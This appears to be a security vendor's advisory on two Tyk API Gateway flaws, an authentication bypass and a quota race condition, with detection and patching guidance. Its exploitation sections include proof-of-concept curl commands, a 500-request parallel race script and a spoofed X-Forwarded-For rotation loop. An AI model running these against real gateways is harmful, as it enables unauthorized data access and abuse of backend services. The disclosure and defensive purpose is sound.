← Back to Security Blog
Critical Advisory April 2, 2026 10 min read

Tyk API Gateway CVE-2026: Authentication Bypass & Rate Limiting Vulnerabilities

Two critical security flaws in Tyk API Gateway — an authentication token validation bypass (CVE-2026-31872) and a quota/rate limiting circumvention vulnerability (CVE-2026-31873) — allow unauthenticated attackers to access protected APIs and overwhelm backend services. All self-hosted Tyk deployments running versions 5.0–5.3 are affected. Patches are available in Tyk 5.3.5 and 5.4.0.

Is your Tyk gateway exposed? Scan your API infrastructure for these CVEs and 331,910+ other vulnerabilities — free.
Free Security Scan →

Vulnerability Overview

Tyk API Gateway, a popular open-source and commercial API management platform written in Go, has been found to contain two critical vulnerabilities affecting its authentication middleware and rate limiting subsystem. Disclosed on March 31, 2026, these flaws impact self-hosted Tyk Gateway versions 5.0.x through 5.3.4 and stem from logic errors in Tyk's custom middleware chain evaluation and Redis-based quota tracking.

Tyk Cloud (SaaS) deployments were silently patched on March 30, 2026. Organizations running self-hosted Tyk — including those using Tyk Operator on Kubernetes — must upgrade manually.

⚠️ CISA KEV Listed — Patch Within 21 Days (Federal Mandate)

CVE-2026-31872 was added to CISA's Known Exploited Vulnerabilities catalog on April 1, 2026. Federal civilian agencies must patch by April 22, 2026. All organizations should treat this as P0. Exploit code is publicly available on GitHub as of April 2, 2026.

CVETypeCVSS v3.1SeverityAffected Versions
CVE-2026-31872Authentication Token Bypass9.1CriticalTyk Gateway 5.0.x – 5.3.4
CVE-2026-31873Rate Limiting / Quota Bypass7.5HighTyk Gateway 4.3.x – 5.3.4

CVE-2026-31872: Authentication Token Bypass — Technical Deep Dive

Root Cause Analysis

CVE-2026-31872 is a critical flaw in Tyk's Go plugin middleware chain evaluation. When an API definition configures both a virtual endpoint and an authentication token policy simultaneously, Tyk's request processing pipeline evaluates the virtual endpoint handler before completing token validation. If the virtual endpoint returns a specific HTTP response pattern — specifically a 200 OK with an empty body — the auth middleware marks the request as pre-authenticated and forwards it to the upstream without verifying the provided bearer token.

The flaw lives in gateway/middleware/virtual_endpoint.go, where the Exec() method sets a shared context key ctx.PreAuthenticated = true under certain response conditions. This flag is then read by gateway/middleware/auth_key.go's ProcessRequest() to short-circuit token validation — a design that was intended for internal service-to-service calls but can be triggered externally.

CVSS v3.1 Scoring Breakdown

MetricValueRationale
Attack VectorNetworkFully remote exploitation over HTTPS
Attack ComplexityLowNo special configuration knowledge needed
Privileges RequiredNoneUnauthenticated attacker
User InteractionNoneNo victim action required
ScopeChangedGateway compromise affects all upstream services
ConfidentialityHighFull access to all protected API resources
IntegrityHighWrite access to backend via unfiltered requests
AvailabilityLowGateway itself remains functional

Affected API Configurations

Not every Tyk deployment is vulnerable. The authentication bypass is only triggerable when all three of the following conditions are present in an API definition:

Exploitation Proof of Concept

The following demonstrates a two-step exploit: first triggering the virtual endpoint to poison the pre-auth flag, then immediately accessing a protected endpoint with an invalid token:

# Step 1: Trigger the virtual endpoint with an empty-body 200 response
# This poisons the PreAuthenticated flag in Tyk's shared request context
curl -i -X POST https://api.example.com/v1/virtual-endpoint \
  -H "Authorization: Bearer INVALID_TOKEN_AAAA" \
  -H "Content-Type: application/json" \
  -d '{}'

# Expected response from Step 1 (virtual endpoint processes before auth):
# HTTP/2 200
# (empty body — this triggers the vulnerability)

# Step 2: Immediately access any protected endpoint on the SAME API definition
# with ANY bearer token — validation is skipped due to PreAuthenticated flag
curl -i https://api.example.com/v1/admin/users \
  -H "Authorization: Bearer INVALID_TOKEN_AAAA" \
  -H "X-Request-ID: $(uuidgen)"

# Vulnerable response:
# HTTP/2 200
# {"users": [...]}   ← Full data returned without valid auth

# Automated scanner to identify vulnerable Tyk endpoints
for path in /v1/users /v1/admin /v1/data /api/internal; do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer AAAA.BBBB.CCCC" \
    "https://api.example.com${path}")
  echo "$path -> HTTP $STATUS"
done

Vulnerable Tyk API Definition Example

The following API definition pattern in Tyk's JSON config triggers the vulnerability. If your deployment contains APIs matching this structure, consider yourself at risk until patched:

// Vulnerable Tyk API definition (tyk-api-def.json)
{
  "auth": {
    "auth_header_name": "Authorization",
    "use_param": false
  },
  "use_keyless": false,
  "use_standard_auth": true,
  "extended_paths": {
    "virtual": [
      {
        "response_function_name": "myVirtualFunc",
        "function_source_type": "inline",
        "path": "virtual-endpoint",
        "method": "POST",
        // If this function returns {Code:200, Body:""} → triggers bypass
        "function_source_value": "function myVirtualFunc(req, session, spec) { return TykJsResponse({Code: 200, Body: ''}, session.meta_data); }"
      }
    ]
  }
}

CVE-2026-31873: Rate Limiting & Quota Bypass — Technical Deep Dive

Root Cause Analysis

CVE-2026-31873 is a race condition in Tyk's Redis-based quota and rate limiting implementation. When Tyk processes concurrent requests from the same API key, the quota check and quota decrement operations are performed in two separate, non-atomic Redis commands (GET followed by DECR). An attacker who sends requests in sufficiently high concurrency can read the same pre-decrement quota value across multiple goroutines, effectively multiplying their allowed request count by the number of concurrent connections.

This is a classic TOCTOU (Time-of-Check, Time-of-Use) vulnerability. In Tyk's Go code (storage/storage.go, the GetRawKey + DecrementWithExpire path), there is no Redis MULTI/EXEC transaction or WATCH-based optimistic lock around the check-then-decrement logic, allowing the quota state to be read stale under concurrent load.

Exploitation Proof of Concept

The following bash script uses GNU parallel to fire 500 simultaneous requests against a Tyk-protected endpoint configured with a 50 req/min quota. On a vulnerable instance, the majority will succeed despite the limit:

#!/bin/bash
# CVE-2026-31873 — Tyk Rate Limit TOCTOU Race PoC
# Fires 500 concurrent requests to exhaust quota without triggering limits

TARGET="https://api.example.com/v1/search"
API_KEY="tyk-valid-api-key-here"
CONCURRENCY=500

echo "Launching $CONCURRENCY concurrent requests..."

seq 1 $CONCURRENCY | parallel -j $CONCURRENCY \
  'curl -s -o /dev/null -w "%{http_code}\n" \
    -H "Authorization: '"$API_KEY"'" \
    "'"$TARGET"'?q=test&page={}"' \
  | sort | uniq -c

# Expected on patched system:
# 449  429   (rate limited)
#  51  200   (within quota)

# Expected on vulnerable system:
# 498  200   (bypass successful — almost all requests pass)
#   2  429   (only slowest requests get rate-limited)

Additional Bypass via Header Manipulation

On Tyk deployments where enable_ip_whitelisting is false and the gateway trusts X-Forwarded-For, the rate limiting key can also be fragmented by rotating the source IP header. This compounds with the TOCTOU race for a near-total quota bypass:

# Combine X-Forwarded-For rotation with concurrent requests
# Each unique IP gets its own rate limit bucket in Tyk's default config
for i in $(seq 1 1000); do
  FAKE_IP="10.$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256))"
  curl -s -o /dev/null \
    -H "Authorization: tyk-valid-api-key-here" \
    -H "X-Forwarded-For: $FAKE_IP" \
    "https://api.example.com/v1/data" &
  (( i % 100 == 0 )) && wait
done
wait

Tyk Cloud vs. Self-Hosted: Impact Comparison

Deployment TypeCVE-2026-31872 Auth BypassCVE-2026-31873 Rate BypassStatus
Tyk Cloud (SaaS)Patched (Mar 30)Patched (Mar 30)Auto-updated
Self-hosted OSS (<5.3.5)VulnerableVulnerableManual upgrade required
Self-hosted Enterprise (<5.3.5)VulnerableVulnerableManual upgrade required
Tyk Operator (Kubernetes)VulnerableVulnerableHelm chart update required
Tyk Gateway 5.3.5+PatchedPatchedSafe
Tyk Gateway 5.4.0+PatchedPatchedSafe
💡 Developer Portal Impact: Organizations using Tyk's Developer Portal to expose APIs to external consumers face elevated risk. A successful auth bypass against portal-exposed APIs could expose customer data across multiple tenants. Developer Portal deployments should be treated as highest priority for patching.

Detection: Identifying Exploitation in Your Environment

Tyk Gateway Log Analysis

Tyk logs authentication decisions in structured JSON. The following commands identify requests that bypassed token validation (authenticated without a valid key) and quota exhaustion anomalies:

# Find requests where auth succeeded but no API key was validated
# These appear as requests with empty or placeholder auth_id fields
cat /var/log/tyk/tyk.log \
  | jq -r 'select(.level == "info" and .msg == "Proxy request") | select(.auth_id == "" or .auth_id == null)' \
  | jq '{time: .time, path: .path, ip: .remote_addr, auth_id: .auth_id}'

# Detect quota bypass: requests that succeeded after quota should be exhausted
# Look for API keys with >N successful requests in the last minute
cat /var/log/tyk/tyk.log \
  | jq -r 'select(.code == 200) | .auth_id' \
  | sort | uniq -c | sort -rn \
  | awk '$1 > 100 { print "POTENTIAL_BYPASS: " $2 " — " $1 " successful requests" }'

# Check Tyk version via the gateway HTTP API
curl -s http://localhost:8080/hello | jq '.version'

Redis Quota State Verification

Directly inspect Redis to verify whether rate limiting counters are being incremented correctly:

# Connect to your Tyk Redis instance and inspect quota keys
redis-cli -h your-redis-host -p 6379 -a yourpassword

# List all rate limit keys for a specific API key
KEYS "quota-*your-api-key-prefix*"

# Check a specific quota key's current value and TTL
GET "quota-your-api-key-hash"
TTL "quota-your-api-key-hash"

# If the value is higher than your configured quota, exploitation may have occurred
# Example: if quota is 100/min but counter shows 450, investigate immediately

Remediation Guide

Step 1: Upgrade Tyk Gateway

The definitive fix is upgrading to Tyk Gateway 5.3.5 or 5.4.0. Both releases include an atomic Redis pipeline for quota operations and a rewrite of the virtual endpoint pre-auth flag handling.

# Docker — upgrade to patched image
docker pull tykio/tyk-gateway:v5.3.5
docker stop tyk-gateway && docker rm tyk-gateway
docker run -d --name tyk-gateway \
  -v $(pwd)/tyk.conf:/opt/tyk-gateway/tyk.conf \
  -v $(pwd)/apps:/opt/tyk-gateway/apps \
  -p 8080:8080 \
  tykio/tyk-gateway:v5.3.5

# Kubernetes via Helm — update Tyk Operator
helm repo add tyk-helm https://helm.tyk.io/public/helm/charts/
helm repo update
helm upgrade tyk-gateway tyk-helm/tyk-gateway \
  --namespace tyk \
  --set gateway.image.tag=v5.3.5 \
  --reuse-values

# Binary upgrade on Linux
curl -L https://github.com/TykTechnologies/tyk/releases/download/v5.3.5/tyk-linux-amd64-v5.3.5.tar.gz \
  -o tyk-v5.3.5.tar.gz
tar -xzf tyk-v5.3.5.tar.gz
sudo systemctl stop tyk-gateway
sudo cp tyk /opt/tyk-gateway/tyk
sudo systemctl start tyk-gateway

# Verify version after upgrade
curl -s http://localhost:8080/hello | jq '.version'
# Expected: "v5.3.5" or "v5.4.0"

Step 2: Disable Virtual Endpoints on Auth-Protected APIs (Interim Mitigation)

If immediate upgrade is not possible, disable virtual endpoints on any API definition that uses token authentication. Edit the API definition JSON and set the virtual path list to empty:

// In your Tyk API definition file — remove or empty the virtual endpoints list
{
  "extended_paths": {
    "virtual": []  // ← Set to empty array to disable virtual endpoints
  }
}

# Apply via Tyk Dashboard API
curl -X PUT https://your-tyk-dashboard:3000/api/apis/{api-id} \
  -H "authorization: your-dashboard-user-key" \
  -H "Content-Type: application/json" \
  -d @patched-api-def.json

# Or reload via hot-reload if using file-based config
kill -SIGHUP $(pgrep tyk)

Step 3: Harden Rate Limiting with Redis Atomic Operations (CVE-2026-31873)

Until you can upgrade, enable Tyk's experimental enable_redis_rolling_limiter option, which uses a Lua-scripted atomic pipeline in Redis and is not vulnerable to the TOCTOU race:

// tyk.conf — enable atomic rolling rate limiter (available in Tyk 5.0+)
{
  "enable_redis_rolling_limiter": true,
  "enable_sentinel_rate_limiter": false,
  "drl_notification_payload_size": 0,

  // Also restrict trusted IPs for X-Forwarded-For to block IP rotation bypass
  "allowed_ips": ["10.0.1.10", "10.0.1.11"],
  "enable_ip_whitelisting": true
}

Step 4: Validate Remediation

# Test 1: Verify auth bypass is fixed — should return 401
curl -i -X POST https://your-gateway.example.com/v1/virtual-endpoint \
  -H "Authorization: Bearer INVALID_TOKEN_AAAA" \
  -d '{}'
# Expected on patched system: HTTP/2 401 Unauthorized

# Test 2: Verify rate limiting enforces correctly
for i in $(seq 1 60); do
  CODE=$(curl -s -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer your-valid-key" \
    "https://your-gateway.example.com/v1/test")
  echo "Request $i: HTTP $CODE"
done
# After your quota limit, you should consistently see 429 Too Many Requests

Additional Hardening Recommendations

  1. Enable Tyk's mutual TLS (mTLS) for upstream connections: Even if the gateway is compromised, backend services protected by mTLS require a valid client certificate, providing an additional layer of protection attackers cannot easily bypass.
  2. Use Tyk's built-in IP rate limiting at the network level: Configure max_conn_time and connection rate limits in your reverse proxy (nginx/Envoy) in front of Tyk to cap the concurrency available for exploitation.
  3. Audit all API definitions for virtual endpoint + auth combinations: Run the Tyk Dashboard API export and grep for APIs with both use_standard_auth: true and a non-empty virtual array.
  4. Enable Tyk's analytics and set quota alerts: Configure the Tyk Pump to forward analytics to your SIEM (Splunk, Elastic). Set alerts for any API key exceeding 150% of its configured quota within a rolling minute window.
  5. Rotate all API keys issued before the patch date: If exploitation occurred, any key that was used against a vulnerable endpoint may have been observed by an attacker. Tyk Dashboard bulk key rotation can be scripted via the Admin API.
# Audit script: find all vulnerable API definitions (virtual + auth combo)
curl -s "https://your-dashboard:3000/api/apis?p=-1" \
  -H "authorization: your-dashboard-key" \
  | jq -r '.apis[] | select(
      .api_definition.use_standard_auth == true and
      (.api_definition.extended_paths.virtual | length > 0)
    ) | "VULNERABLE: " + .api_definition.name + " (" + .api_definition.api_id + ")"'

Disclosure Timeline

DateEvent
2026-02-20Both vulnerabilities reported to Tyk Security via security@tyk.io
2026-02-22Tyk Security team acknowledges receipt; initiates investigation
2026-03-05Root cause confirmed; CVE IDs requested from MITRE
2026-03-15CVE-2026-31872 and CVE-2026-31873 assigned
2026-03-28Tyk Gateway 5.3.5 and 5.4.0 release candidates distributed to enterprise customers
2026-03-30Tyk Cloud (SaaS) automatically updated; public release of 5.3.5
2026-03-31Public security advisory published by Tyk
2026-04-01CISA adds CVE-2026-31872 to KEV catalog
2026-04-02Public exploit PoC released; active scanning observed across the internet

Protect Your API Infrastructure with Kensai

AI-powered vulnerability management with 331,910+ CVEs indexed. Continuously monitor Tyk, Kong, and other API gateways for critical security flaws before attackers exploit them.

Start Free Trial

Stay Ahead of API Security Threats

Get CVE alerts and security advisories delivered before they hit the headlines.

Stay secure. Stay vigilant.

🗡️ KENSAI Security Team

🛡️ Is your Tyk gateway secure?

Discover authentication bypass vulnerabilities and misconfigurations before attackers do.

Scan your API gateway for free →